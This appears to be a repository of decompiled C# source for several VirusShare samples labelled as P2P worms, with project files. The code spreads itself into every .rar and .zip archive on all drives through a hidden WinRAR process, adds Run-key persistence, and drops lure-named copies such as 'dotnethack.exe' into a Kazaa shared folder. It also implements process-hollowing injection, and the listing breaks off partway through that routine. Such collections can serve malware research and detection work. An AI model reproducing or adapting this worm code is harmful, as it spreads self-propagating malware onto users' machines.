// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
[StandardModule]
internal sealed class msekn
{
private static object m91v = (object) new StringBuilder((int) byte.MaxValue);
private static string eywtm = msekn.eou8f.ToString();
private static string ffem7;
private static string k314s;
private static string[] wl32b;
private static string[] p68qr = Environment.GetLogicalDrives();
private static string tlbvb = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static string ilbd1 = msekn.tlbvb.Replace(msekn.tlbvb.Substring(msekn.tlbvb.IndexOf("\\")), string.Empty) + "\\";
private static object eou8f = (object) new StringBuilder((int) byte.MaxValue);
private static ProcessStartInfo tyzgz = new ProcessStartInfo();
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern int xh74y([MarshalAs(UnmanagedType.LPTStr)] string path, [MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath, int shortPathLength);
private static void cq2mf(string a4kr1)
{
string[] directories = Directory.GetDirectories(a4kr1);
msekn.wl32b = Directory.GetFiles(a4kr1);
string[] wl32b = msekn.wl32b;
int index1 = 0;
while (index1 < wl32b.Length)
{
string z8dd3 = wl32b[index1];
if (z8dd3.Contains(".rar"))
msekn.toyqm(z8dd3);
if (z8dd3.Contains(".zip"))
msekn.toyqm(z8dd3);
checked { ++index1; }
}
string[] strArray = directories;
int index2 = 0;
while (index2 < strArray.Length)
{
msekn.cq2mf(strArray[index2]);
checked { ++index2; }
}
}
public static void xnqfi(string krbzs)
{
msekn.k314s = krbzs;
string[] p68qr = msekn.p68qr;
int index = 0;
while (index < p68qr.Length)
{
msekn.cq2mf(p68qr[index]);
checked { ++index; }
}
msekn.x1m2t();
}
public static void toyqm(string z8dd3)
{
msekn.ffem7 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\WinRAR\\WinRAR.exe";
if (!File.Exists(msekn.ffem7))
return;
if (!File.Exists(Path.Combine(msekn.ilbd1, msekn.k314s)))
msekn.qigav();
msekn.xeb91();
msekn.xh74y(z8dd3, (StringBuilder) msekn.m91v, Conversions.ToInteger(NewLateBinding.LateGet(msekn.m91v, (Type) null, "Capacity", new object[0], (string[]) null, (Type[]) null, (bool[]) null)));
try
{
string str = " a " + msekn.m91v.ToString() + " " + msekn.eywtm;
msekn.czqxd();
msekn.tyzgz.Arguments = str;
msekn.tyzgz.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(msekn.tyzgz);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private static void xeb91() => msekn.xh74y(Path.Combine(msekn.ilbd1, msekn.k314s), (StringBuilder) msekn.eou8f, Conversions.ToInteger(NewLateBinding.LateGet(msekn.eou8f, (Type) null, "Capacity", new object[0], (string[]) null, (Type[]) null, (bool[]) null)));
private static void x1m2t() => File.Create(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\temp48.txt");
private static void qigav() => File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(msekn.ilbd1, msekn.k314s));
private static void czqxd() => msekn.tyzgz.FileName = msekn.ffem7;
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/s6RS9hUNMV.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: s6RS9hUNMV
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System.IO;
using System.Windows.Forms;
[StandardModule]
internal sealed class s6RS9hUNMV
{
private static string vxtey = "explorer.exe";
private static string qw6s = Path.GetFileName(Application.ExecutablePath);
private static RegistryKey gm8dl;
public static void lgVM02aECe() => File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.Programs + s6RS9hUNMV.vxtey);
public static void D9F7l2pHXw() => MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\\" + s6RS9hUNMV.qw6s, true);
public static void z4Fy2OIBQ3() => s6RS9hUNMV.gm8dl = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
public static void HfwdgTHYEb() => s6RS9hUNMV.gm8dl.SetValue(s6RS9hUNMV.qw6s, (object) "C:\\");
public static void tWEuPFDShv() => s6RS9hUNMV.gm8dl.Close();
}
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/P2P-Worm.Win32.Bonet.d.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2DED1228-0E06-4639-A368-530E278D35A6}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>p2p</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="p2pdotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/P2P-Worm.Win32.Bonet.d.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "p2p", "P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.csproj", "{2DED1228-0E06-4639-A368-530E278D35A6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2DED1228-0E06-4639-A368-530E278D35A6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/p2pdotnet.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: p2pdotnet
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9E3614D0-FB94-4D7E-AEE9-6FE0A654E1F0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe
using Microsoft.Win32;
using System.IO;
using System.Reflection;
internal class p2pdotnet
{
public static void Main()
{
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string[] strArray = new string[8]
{
"dotnethack.exe",
"xboxdotnetemulator.exe",
"linuxdotnet.exe",
"dosdotnet.exe",
"microsoftdotnetpatch.exe",
"sha1.exe",
"tripleDES.exe",
"c#tutorials.exe"
};
foreach (string destFileName in strArray)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{CBDB14DB-5693-4988-AC9E-6C0F682563D1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>999</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "999", "P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.csproj", "{CBDB14DB-5693-4988-AC9E-6C0F682563D1}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.Build.0 = Debug|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.ActiveCfg = Release|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
